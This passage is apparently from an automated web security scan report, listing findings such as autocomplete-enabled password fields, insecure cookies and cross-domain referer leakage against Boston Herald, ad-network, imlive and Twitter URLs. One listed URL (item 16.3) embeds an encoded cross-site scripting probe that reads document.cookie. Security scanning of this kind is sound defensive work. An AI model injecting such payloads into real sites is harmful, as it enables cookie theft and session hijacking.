11.484. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1616156922/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

11.485. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/1911154246/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

11.486. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/2083207614/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

11.487. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/219928446/Top1/USNetwork/BCN2010110890_003_CMT/CMT_NETBLOCK_728.html/726348573830307044726341416f7670

11.488. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/53616777/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

11.489. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/537212856/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

11.490. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/702021509/Top1/USNetwork/BCN2010090393_015a_HRBlock/hrblock_cc_728.html/726348573830307044726341416f7670

11.491. http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/857611358/Top1/USNetwork/BCN2010110890_003_CMT/CMT_NETBLOCK_728.html/726348573830307044726341416f7670

11.492. http://nl.imlive.com/

11.493. http://nl.imlive.com/waccess/

11.494. http://no.imlive.com/

11.495. http://no.imlive.com/waccess/

11.496. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1204429614@Top,Middle,Right,Right1,x01,x02,x03,x04

11.497. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1244397821@Top,Middle,Right,Right1,x01,x02,x03,x04

11.498. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1494452952@Top,Middle,Right,Right1,x01,x02,x03,x04

11.499. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1202419556/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c

11.500. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1247919265/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c

11.501. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1258292573/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/7263485738303033424c73414270536c

11.502. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/126580716/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/7263485738303033424c73414270536c

11.503. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/133886311/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c

11.504. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1410609386/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c

11.505. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1462172569/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/7263485738303033424c73414270536c

11.506. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/167914676/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/7263485738303033424c73414270536c

11.507. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1790696998/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c

11.508. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1813901630/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/7263485738303033424c73414270536c

11.509. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2021312465/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c

11.510. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2141444174/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c

11.511. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/589036194/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c

11.512. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/672313137/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c

11.513. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/677208420/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c

11.514. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/blogs/news/lone_republican@Top,Right,Middle!Middle

11.515. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/blogs/news/lone_republican@Top,Right,Middle!Right

11.516. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/blogs/news/lone_republican@Top,Right,Middle!Top

11.517. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Bottom

11.518. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle

11.519. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle1

11.520. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle2

11.521. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Top

11.522. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x14

11.523. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x15

11.524. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!x16

11.525. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@x01!x01

11.526. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/mediacenter@Top,Right,Middle,Bottom!Middle

11.527. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Bottom

11.528. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Middle

11.529. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Right

11.530. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/politics/article@Top,Right,Middle,Bottom!Top

11.531. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Bottom

11.532. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Middle

11.533. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Middle1

11.534. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Right

11.535. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Top

11.536. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Bottom

11.537. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

11.538. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

11.539. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1

11.540. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1

11.541. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Top

11.542. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@x05!x05

11.543. http://oascentral.bostonherald.com/RealMedia/ads/adstream_mjx.ads/bh.heraldinteractive.com/home/1392253820@Position1,Position2

11.544. http://pu.imlive.com/

11.545. http://pu.imlive.com/waccess/

11.546. http://ru.imlive.com/

11.547. http://ru.imlive.com/waccess/

11.548. http://se.imlive.com/

11.549. http://se.imlive.com/waccess/

11.550. http://smm.sitescout.com/click

11.551. http://syndication.mmismm.com/mmtnt.php

11.552. http://tag.contextweb.com/TAGPUBLISH/getad.aspx

11.553. http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/

11.554. http://tap.rubiconproject.com/oz/sensor

11.555. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js

11.556. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/click.txt

11.557. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/view.pxl

11.558. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt

11.559. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt&clickTag2=http:/r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000935955/cstr=44199605=_4d436292,1445734807,766161^935955^1183^0,1_/xsxdata=$xsxdata/bnum=44199605/optn=64

11.560. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/view.pxl

11.561. http://tr.imlive.com/

11.562. http://tr.imlive.com/waccess/

11.563. http://voken.eyereturn.com/

11.564. http://voken.eyereturn.com/

11.565. http://voken.eyereturn.com/pb/get

11.566. http://voken.eyereturn.com/pix

11.567. http://www.addthis.com/bookmark.php

11.568. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

11.569. http://www.moxiesoft.com/tal_products/chat.aspx

11.570. http://www.nydailynews.com/blogs/jets/2011/01/live-chat-friday-noon-1

11.571. http://www.nydailynews.com/blogs/rangers/2011/01/live-chat-wednesday-at-2-pm

11.572. http://www.parkersoft.co.uk/client.aspx

11.573. http://www.parkersoft.co.uk/supnotes.aspx

11.574. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

11.575. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

11.576. http://www.zvents.com/zat

11.577. http://xads.zedo.com/ads2/c

12. Password field with autocomplete enabled

12.1. http://ar.imlive.com/

12.2. http://bostonherald.com/track/inside_track/view.bg

12.3. http://bostonherald.com/track/star_tracks/view.bg

12.4. http://bostonherald.com/users/login

12.5. http://bostonherald.com/users/register/

12.6. http://br.imlive.com/

12.7. http://cafr.imlive.com/

12.8. http://de.imlive.com/

12.9. http://digg.com/submit

12.10. http://digg.com/submit

12.11. http://dk.imlive.com/

12.12. http://es.imlive.com/

12.13. http://fr.imlive.com/

12.14. http://gr.imlive.com/

12.15. http://imlive.com/

12.16. http://imlive.com/homepagems3.asp

12.17. http://imlive.com/webcam-login/

12.18. http://in.imlive.com/

12.19. http://it.imlive.com/

12.20. http://jp.imlive.com/

12.21. http://mx.imlive.com/

12.22. http://nl.imlive.com/

12.23. http://no.imlive.com/

12.24. http://pu.imlive.com/

12.25. http://ru.imlive.com/

12.26. http://se.imlive.com/

12.27. http://support.moxiesoft.com/

12.28. http://tr.imlive.com/

12.29. http://twitter.com/

12.30. http://twitter.com/247realmedia

12.31. http://twitter.com/AddThis

12.32. http://twitter.com/Applebees

12.33. http://twitter.com/AshieApple

12.34. http://twitter.com/Beckett_News

12.35. http://twitter.com/BosHerald_Edge/

12.36. http://twitter.com/ChrisLambton13

12.37. http://twitter.com/ConanOBrien

12.38. http://twitter.com/DustinPedroia15

12.39. http://twitter.com/ExpertDan

12.40. http://twitter.com/GQMagazine

12.41. http://twitter.com/Gr8BosFoodBank

12.42. http://twitter.com/Harvard

12.43. http://twitter.com/Jarvis_Green

12.44. http://twitter.com/JennyMcCarthy

12.45. http://twitter.com/John_W_Henry

12.46. http://twitter.com/KaseyRKahl

12.47. http://twitter.com/KhloeKardashian

12.48. http://twitter.com/KimKardashian

12.49. http://twitter.com/Late_Show

12.50. http://twitter.com/LibertyHotel

12.51. http://twitter.com/Michael_Joseph

12.52. http://twitter.com/MittRomney

12.53. http://twitter.com/NewYorkPost

12.54. http://twitter.com/Nicole_114

12.55. http://twitter.com/Oprah

12.56. http://twitter.com/PageLines

12.57. http://twitter.com/PhantomGourmet

12.58. http://twitter.com/Prucenter

12.59. http://twitter.com/PureADK

12.60. http://twitter.com/ROBERTPLANT

12.61. http://twitter.com/RealLamarOdom

12.62. http://twitter.com/RobertDuffy

12.63. http://twitter.com/ScampoLiberty

12.64. http://twitter.com/Script_Junkie

12.65. http://twitter.com/Sean_P_Doyle

12.66. http://twitter.com/Servigistics

12.67. http://twitter.com/ShaunieONeal

12.68. http://twitter.com/Simply_b06

12.69. http://twitter.com/Siobhan_Magnus

12.70. http://twitter.com/SlexAxton

12.71. http://twitter.com/StarWrit

12.72. http://twitter.com/Support

12.73. http://twitter.com/Svantasukhai

12.74. http://twitter.com/THE_REAL_SHAQ

12.75. http://twitter.com/TV38Boston

12.76. http://twitter.com/TechCrunch

12.77. http://twitter.com/TheKateBosworth

12.78. http://twitter.com/Trackgals

12.79. http://twitter.com/Trackgals/

12.80. http://twitter.com/_juliannemoore

12.81. http://twitter.com/ajpiano

12.82. http://twitter.com/androidnewsblog

12.83. http://twitter.com/backstreetboys

12.84. http://twitter.com/benmezrich

12.85. http://twitter.com/bennadel

12.86. http://twitter.com/bostonherald

12.87. http://twitter.com/cjronson

12.88. http://twitter.com/cowboy

12.89. http://twitter.com/creationix

12.90. http://twitter.com/dandenney

12.91. http://twitter.com/danwrong

12.92. http://twitter.com/davevogler

12.93. http://twitter.com/deionbranch84

12.94. http://twitter.com/dougneiner

12.95. http://twitter.com/ebello

12.96. http://twitter.com/ericmmartin

12.97. http://twitter.com/gercheq

12.98. http://twitter.com/harvardlampoon

12.99. http://twitter.com/j_hollender

12.100. http://twitter.com/jayleno

12.101. http://twitter.com/jbchang

12.102. http://twitter.com/joedwinell/

12.103. http://twitter.com/joemccann

12.104. http://twitter.com/jordanknight

12.105. http://twitter.com/kennychesney

12.106. http://twitter.com/kfaulk33

12.107. http://twitter.com/lapubell

12.108. http://twitter.com/login

12.109. http://twitter.com/malsup

12.110. http://twitter.com/malsup/favorites

12.111. http://twitter.com/malsup/lists/memberships

12.112. http://twitter.com/mariamenounos

12.113. http://twitter.com/mattbanks

12.114. http://twitter.com/mennovanslooten

12.115. http://twitter.com/messengerpost

12.116. http://twitter.com/miketaylr

12.117. http://twitter.com/moxiesoft

12.118. http://twitter.com/onlyjazz

12.119. http://twitter.com/oschina

12.120. http://twitter.com/rachbarnhart

12.121. http://twitter.com/rem

12.122. http://twitter.com/rickrussie

12.123. http://twitter.com/roctimo

12.124. http://twitter.com/rwaldron

12.125. http://twitter.com/ryanolson

12.126. http://twitter.com/scott_gonzalez

12.127. http://twitter.com/search

12.128. http://twitter.com/sentience

12.129. http://twitter.com/simplemodal

12.130. http://twitter.com/sitepointdotcom

12.131. http://twitter.com/slaterusa

12.132. http://twitter.com/stubbornella

12.133. http://twitter.com/thehomeorg

12.134. http://twitter.com/townsandtrails

12.135. http://twitter.com/travis

12.136. http://twitter.com/tylerseguin92

12.137. http://twitter.com/waynecountylife

12.138. http://twitter.com/webandy

12.139. http://twitter.com/zonajones

12.140. http://www.bostonherald.com/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also

12.141. http://www.bostonherald.com/business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also

12.142. http://www.bostonherald.com/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6

12.143. http://www.bostonherald.com/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=also

12.144. http://www.bostonherald.com/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2

12.145. http://www.bostonherald.com/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also

12.146. http://www.bostonherald.com/news/national/general/view/20110128remembering_the_challengers_haunting_explosion/format=comments&srvc=home&position=5

12.147. http://www.bostonherald.com/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1

12.148. http://www.bostonherald.com/news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0

12.149. http://www.bostonherald.com/news/regional/view.bg

12.150. http://www.bostonherald.com/news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also

12.151. http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4

12.152. http://www.bostonherald.com/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also

12.153. http://www.bostonherald.com/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7

12.154. http://www.bostonherald.com/track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/format=comments&srvc=track&position=also

12.155. http://www.bostonherald.com/track/inside_track/view/20110127boy_banders_faithful_to_fenway/format=comments&srvc=track&position=also

12.156. http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=home&position=also

12.157. http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=track&position=also

12.158. http://www.bostonherald.com/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=3

12.159. http://www.bostonherald.com/users/register

12.160. http://www.bostonherald.com/users/register/

12.161. http://www.paperg.com/

12.162. https://www.paperg.com/post.php

12.163. https://www.paperg.com/post.php

12.164. http://www.parker-software.com/forum/

12.165. http://www.parkersoft.co.uk/client.aspx

12.166. http://www.screenthumbs.com/

12.167. http://www.screenthumbs.com/about

12.168. http://www.screenthumbs.com/contact

12.169. http://www.screenthumbs.com/forgot

12.170. http://www.screenthumbs.com/linkthumbs

12.171. http://www.screenthumbs.com/plugins

12.172. http://www.screenthumbs.com/service

12.173. http://www.screenthumbs.com/signup

12.174. http://www.screenthumbs.com/signup.php

12.175. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

13. Source code disclosure

14. Referer-dependent response

14.1. http://ad.doubleclick.net.57389.9231.302br.net/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7

14.2. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90

14.3. http://c.brightcove.com/services/viewer/federated_f9

14.4. http://onset.freedom.com/fi/analytics/cms/

14.5. http://twitter.com/malsup

14.6. http://www.screenthumbs.com/tools/js/linkthumbs.js

15. Cross-domain POST

15.1. http://www.bostonherald.com/store/

15.2. http://www.bostonherald.com/store/

15.3. http://www.bostonherald.com/store/

15.4. http://www.bostonherald.com/store/

15.5. http://www.bostonherald.com/store/

15.6. http://www.bostonherald.com/store/

15.7. http://www.bostonherald.com/store/

15.8. http://www.bostonherald.com/store/

15.9. http://www.bostonherald.com/store/

15.10. http://www.bostonherald.com/store/

15.11. http://www.bostonherald.com/store/

15.12. http://www.bostonherald.com/store/

15.13. http://www.bostonherald.com/store/

15.14. http://www.bostonherald.com/store/

15.15. http://www.bostonherald.com/store/

15.16. http://www.bostonherald.com/store/

15.17. http://www.bostonherald.com/store/

15.18. http://www.bostonherald.com/store/

15.19. http://www.bostonherald.com/store/

15.20. http://www.bostonherald.com/store/

16. SSL cookie without secure flag set

16.1. https://base.liveperson.net/hc/5296924/

16.2. https://base.liveperson.net/hc/5296924/

16.3. https://base.liveperson.net/hc/5296924/5296924bff27%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e8465f0f4edd/

17. Cross-domain Referer leakage

17.1. http://a.tribalfusion.com/j.ad

17.2. http://a.tribalfusion.com/j.ad

17.3. http://ad.afy11.net/ad

17.4. http://ad.afy11.net/ad

17.5. http://ad.afy11.net/ad

17.6. http://ad.doubleclick.net/adi/N3093.130430.MINDSETMEDIA/B4053191

17.7. http://ad.doubleclick.net/adi/N3093.130430.MINDSETMEDIA/B4053191

17.8. http://ad.doubleclick.net/adi/N3671.CentroNetwork/B5159652.2

17.9. http://ad.doubleclick.net/adi/N3740.270604.B3/B5112048

17.10. http://ad.doubleclick.net/adi/N3740.270604.B3/B5112048

17.11. http://ad.doubleclick.net/adi/N3740.TribalFusion.com/B5132291.17

17.12. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10

17.13. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10

17.14. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10

17.15. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5

17.16. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5

17.17. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

17.18. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

17.19. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

17.20. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

17.21. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

17.22. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

17.23. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

17.24. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

17.25. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

17.26. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

17.27. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

17.28. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

17.29. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

17.30. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

17.31. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

17.32. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

17.33. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

17.34. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

17.35. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

17.36. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

17.37. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

17.38. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

17.39. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

17.40. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

17.41. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

17.42. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

17.43. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

17.44. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

17.45. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

17.46. http://ad.doubleclick.net/adi/N4270.Tribal_Fusion/B5094437.2

17.47. http://ad.doubleclick.net/adi/N4270.Tribal_Fusion/B5094437.2

17.48. http://ad.doubleclick.net/adi/N4319.MSNMEN/B3889285.5

17.49. http://ad.doubleclick.net/adi/N4319.MSNMEN/B3889285.6

17.50. http://ad.doubleclick.net/adi/N4319.MSNMEN/B3889285.7

17.51. http://ad.doubleclick.net/adi/N4319.msn/B2087123.382

17.52. http://ad.doubleclick.net/adi/N4682.132309.BURSTMEDIA/B4421704.7

17.53. http://ad.doubleclick.net/adi/N4682.132309.BURSTMEDIA/B4421704.7

17.54. http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5157804.4

17.55. http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5157804.5

17.56. http://ad.doubleclick.net/adi/N5956.Advertising.com/B3941858.17

17.57. http://ad.doubleclick.net/adi/N5956.Advertising.com/B3941858.17

17.58. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.3

17.59. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.3

17.60. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.5

17.61. http://ad.doubleclick.net/adj/N3340.trfu/B4677841.19

17.62. http://ad.doubleclick.net/adj/N3340.trfu/B4677841.19

17.63. http://ad.doubleclick.net/adj/N3340.trfu/B4938104.54

17.64. http://ad.doubleclick.net/adj/N3340.trfu/B4938104.54

17.65. http://ad.doubleclick.net/adj/N3340.trfu/B5083632.138

17.66. http://ad.doubleclick.net/adj/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6

17.67. http://ad.doubleclick.net/adj/N4506.interclick.com/B5098486.2

17.68. http://ad.doubleclick.net/adj/N4506.interclick.com/B5098486.2

17.69. http://ad.doubleclick.net/adj/N4610.270478.AOLADVERTISINGADVER/B5087810.46

17.70. http://ad.doubleclick.net/adj/N6103.135388.BIZO/B5185769.6

17.71. http://ad.doubleclick.net/adj/N6103.135388.BIZO/B5185769.6

17.72. http://ad.doubleclick.net/adj/cm.rev_bostonherald/

17.73. http://ad.doubleclick.net/adj/cm.rev_bostonherald/

17.74. http://ad.doubleclick.net/adj/cm.rev_bostonherald/

17.75. http://ad.doubleclick.net/adj/cm.rev_bostonherald/

17.76. http://ad.doubleclick.net/adj/cm.rev_bostonherald/

17.77. http://ad.doubleclick.net/adj/cm.rev_bostonherald/

17.78. http://ad.doubleclick.net/adj/cm.rev_bostonherald/

17.79. http://ad.doubleclick.net/adj/fbi.wrgb.cbs6albany/classified

